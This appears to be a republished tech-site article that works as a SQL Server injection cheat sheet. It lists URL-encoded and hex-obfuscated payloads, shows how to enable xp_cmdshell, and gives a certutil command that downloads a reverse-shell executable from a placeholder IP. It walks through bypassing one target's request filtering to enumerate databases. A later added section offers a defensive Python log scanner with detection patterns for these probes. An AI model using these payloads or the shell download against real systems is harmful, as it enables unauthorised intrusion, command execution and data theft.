2025-02-24 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article explains in detail how to carry out SQL Server injection analysis. The editor shares it as a reference, and I hope you will have a good grasp of the relevant knowledge after reading it.
Most of the databases I ran into during the penetration testing projects of my internship were SQL Server, so this can be seen as an important step in getting to know MSSQL.
Get all the tables in a database (assuming the database name is fooDB)

```sql
-- xtype='U': all user tables
-- xtype='S': all system tables
SELECT name FROM fooDB..sysobjects WHERE xtype='U'
```

Get all the column names of a table (assuming the table name is fooTable)

```sql
SELECT name FROM syscolumns WHERE id=OBJECT_ID('fooTable')
```

Delayed (time-based) injection

```sql
-- WAITFOR runs as a second, stacked statement: the response arrives 3 seconds late
SELECT * FROM fooTable WHERE id=1 WAITFOR DELAY '0:0:3'
```
2. Common built-in functions

```sql
DB_NAME()      -- current database name
USER           -- current user name
SUSER_NAME()   -- login name
```
3. Case-sensitive mode for LIKE queries

```sql
SELECT * FROM dt WHERE columnname COLLATE Chinese_PRC_CS_AS LIKE 'aa%';
```

Take Chinese_PRC_CS_AI_WS as an example:
The first half names the character set: Chinese_PRC_ refers to the UNICODE sort rules for mainland simplified Chinese.
_BIN: binary sort
_CI / _CS: case-insensitive / case-sensitive
_AI / _AS: accent-insensitive / accent-sensitive
_KI / _KS: kana-insensitive / kana-sensitive (hiragana vs. katakana)
_WI / _WS: width-insensitive / width-sensitive (half-width vs. full-width)
4. Implementing LIMIT m,n

Items 7 to 9 of the result set, like limit 7,3 in MySQL:

```sql
SELECT TOP 3 id FROM tablename
WHERE id NOT IN (
    SELECT TOP 6 id FROM tablename
)
```
Enable the xp_cmdshell stored procedure

```sql
EXEC sp_configure 'show advanced options', 1
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', 1
RECONFIGURE
```

To turn it off, change the second 1 in the statements above to 0 and execute them again.

Run commands

```sql
EXEC master..xp_cmdshell 'whoami'
EXEC master..xp_cmdshell 'ping 127.0.0.1 -n 5 > nul'
EXEC master..xp_cmdshell 'certutil -urlcache -split -f http://IP/re_shell.exe D:\re_shell.exe'
```

A thorough defense against xp_cmdshell: fix the SQL injection vulnerabilities and remove the xplog70.dll component.
When AND is usable:
?key=aa'+and+db_name()>1
When AND is filtered (string concatenation with varchar ^ int instead):
?key='%2buser()^1
Type conversion with convert():
?key=a'%2b(convert(int,@@version))
Mixed case with the statement hex-encoded (the hex literal decodes to select convert(int,@@version)):
;dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c404076657273696f6e29 eXeC(@s)--
2. Example: the page returns an error when a single quotation mark is entered.
Trying the comment sequences %23 and --+- identifies the back-end database type: a malformed statement returns 200 with an error, while a correct one returns 302, so it is known to be MSSQL.
The server intercepts and filters the data and refuses to process the request, but varchar ^ int can still be used to expose data.
?appSysCode='%2buser%5e1--+-
The interception is fairly good. I tried a lot of select variants, but none of them worked.
?appSysCode=a'%2b(select+'aaa')--+-
?appSysCode=a'%2b(select+1)%5e1--+-
?appSysCode=a'%2b(convert(int,(select+'bbb')%5e1))--+- (only an error is reported here)
?appSysCode=a'%2b(convert(varchar,(select+'bbb')%5e1))--+- (returns 302 directly)
?appSysCode=a'%2b(convert(int,(select+'bbb')))--+-
?appSysCode=a'%3bSELECT+11--+-
?appSysCode=a'%3bexec+xxxxx--+-
But there are still flaws in the rules.
?appSysCode=a'%3bselect+*+from+(select+'aaa'+as+c)+t2+where+c%5e1--+-
Arbitrary data can then be revealed.
?appSysCode=a'%3bSELECT+name+FROM+master..sysdatabases+where+name%5e1%3e0+and+name+NOT+IN+('master','model','msdb','tempdb','northwind','pubs')--+-
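As an added example (not code from the original article), here is the defender's side of the probes shown above: a small Python triage script for web access logs that recognises the varchar ^ int and convert(int, ...) error probes, the mixed-case hex-wrapped EXEC, the WAITFOR DELAY timing check and xp_cmdshell calls. It URL-decodes each query string once, lowercases it and expands 0x literals before matching, so the casing and hex tricks above do not hide the statement; the log lines and the parameter name key are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Detection rules drawn from the probes walked through above. Each rule names the
# behaviour worth alerting on; this is a triage aid, not a complete SQLi grammar.
SIGNATURES = {
    "type-mismatch error probe": re.compile(r"convert\s*\(\s*int\s*,|\^\s*\d"),
    "time-based probe":          re.compile(r"waitfor\s+delay"),
    "command execution":         re.compile(r"xp_cmdshell|sp_configure"),
    "metadata enumeration":      re.compile(r"sys(objects|columns|databases)"),
    "stacked query":             re.compile(r";\s*(declare|exec|select)\b"),
}
HEX_LITERAL = re.compile(r"0x([0-9a-f]{2,})")
REQUEST_LINE = re.compile(r'"(?:GET|POST) \S*\?(\S*) HTTP/')

def _hex_to_text(match):
    """Replace a 0x... literal by its ASCII meaning when it decodes cleanly."""
    try:
        text = bytes.fromhex(match.group(1)).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return match.group(0)
    return text if text.isprintable() else match.group(0)

def normalize(query_string):
    """URL-decode once (so %2b stays '+' and a bare '+' becomes a space), lower-case
    to defeat dEcLaRe-style casing, and expand hex literals handed to EXEC()."""
    return HEX_LITERAL.sub(_hex_to_text, unquote_plus(query_string).lower())

def classify(query_string):
    """Names of every signature that fires on the normalized query string."""
    norm = normalize(query_string)
    return [name for name, rx in SIGNATURES.items() if rx.search(norm)]

def scan_log(lines):
    """Yield (status, query_string, hits) for each logged request that trips a rule."""
    for line in lines:
        m = REQUEST_LINE.search(line)
        if m and (hits := classify(m.group(1))):
            yield line.rsplit(" ", 1)[-1], m.group(1), hits

# Constructed sample access-log lines (not from any real server) in the shape of
# the probes above; the 200/302 split mirrors the error/success behaviour described.
SAMPLE_LOG = [
    '10.0.0.5 - - [31/May/2020:10:00:01 +0800] "GET /q?key=aa HTTP/1.1" 302',
    '10.0.0.5 - - [31/May/2020:10:00:02 +0800] "GET /q?key=%27%2buser()%5e1--+- HTTP/1.1" 200',
    '10.0.0.5 - - [31/May/2020:10:00:03 +0800] "GET /q?key=a%27%2b(convert(int,@@version))--+- HTTP/1.1" 200',
    '10.0.0.5 - - [31/May/2020:10:00:04 +0800] "GET /q?key=a%27%3bdEcLaRe+@s+vArChAr(8000)+sEt+@s%3d0x73656c65637420636f6e7665727428696e742c404076657273696f6e29+eXeC(@s)--+- HTTP/1.1" 200',
    '10.0.0.5 - - [31/May/2020:10:00:05 +0800] "GET /q?key=1+WAITFOR+DELAY+%270:0:3%27-- HTTP/1.1" 302',
]
```

`list(scan_log(SAMPLE_LOG))` flags four of the five lines; the hex-wrapped request is reported as both a type-mismatch probe and a stacked query because the expanded literal is inspected as the statement it carries.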
This concludes the analysis of how to carry out SQL Server injection. I hope the above content is helpful and that you have learned something from it. If you found the article useful, share it so that more people can see it.